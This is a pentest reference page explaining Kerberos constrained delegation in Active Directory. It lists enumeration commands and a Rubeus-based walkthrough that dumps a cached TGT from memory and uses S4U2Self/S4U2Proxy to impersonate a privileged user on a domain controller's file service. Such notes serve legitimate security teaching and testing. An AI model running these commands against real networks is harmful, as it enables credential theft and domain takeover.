Constrained Delegation

Constrained Delegation is a feature in the Kerberos authentication protocol that allows a service to request a Service Ticket for explicitly specified services on behalf of a user.

The Trust this computer for delegation to specified services only privilege must be enabled in the Delegation tab within the object/computer's properties.

Attribute: msDS-AllowedToDelegateTo

When constrained delegation is enabled on a computer, it allows the computer to request a Service Ticket on behalf of another user for a specific service. This is done using the S4U2Self and S4U2Proxy Kerberos extensions.

Enumeration

GitHub - fortra/impacket: Impacket is a collection of Python classes for working with network protocols.GitHub

Llinux (Attacker)

findDelegation.py [domain]/[username]:[password]

Get-ADComputer (ActiveDirectory)MicrosoftLearn

Windows (Target)

Get-ADComputer "Account" -Properties TrustedForDelegation,TrustedToAuthForDelegation,msDS-AllowedToDelegateTo,PrincipalsAllowedToDelegateToAccount

The ldapsearch Command-Line Tooldocs.ldap.com

Linux (Attacker)

ldapsearch -x -H ldap://[DC FQCN] \
-D 'user@domain' -w 'password' \
-b 'DC=domain,DC=local' \
'(&(objectCategory=computer)(msDS-AllowedToDelegateTo=*))' \
dNSHostName sAMAccountName msDS-AllowedToDelegateTo

Exploit

GitHub - GhostPack/Rubeus: Trying to tame the three-headed dog.GitHub

GitHub - S3cur3Th1sSh1t/SharpImpersonation: A User Impersonation tool - via Token or Shellcode injectionGitHub

Scenario

SQL$ has constrained delegation rights to CIFS/DC$, and you have access to a host where the TGT of SQL$ is stored in memory.

The goal is to extract the TGT for SQL$ and use S4U2Proxy (which requires Kerberos tickets we can obtain using S4U2Self) to gain access to CIFS/DC$.

Windows

## Show Cached Tickets
Rubeus.exe triage

## Extract The TGT Using Its LUID (/nowrap To Make It Copy Friendly)
Rubeus.exe dump /luid:[luid of target tgt] /nowrap

## Perform a S4U2Self to obtain TGS for SQL$
Rubeus.exe s4u /impersonateuser:[privileged user] /msdsspn:cifs/dc.[domain] /user:sql$ /ticket:[tgt] /nowrap

## Perform a S4U2Proxy to obtain TGS for CIFS/DC$

Rubeus.exe createnetonly /program:C:\Windows\System32\cmd.exe /domain:[domain] /username:[privileged user] /password:AnyPassword /ticket:[tgs for sql$]

## Use A Tool To Impersonate The Process Created Above
Invoke-SharpImpersonation -Command "pid:[pid]"

You must have elevated privileges on the target computer in order to dump TGTs from LSASS.

PreviousUnconstrained Delegation (User)NextResource-Based Constrained Delegation

Last updated 12 days ago

hashtagEnumeration

hashtagExploit

hashtagScenario

Enumeration

Exploit

Scenario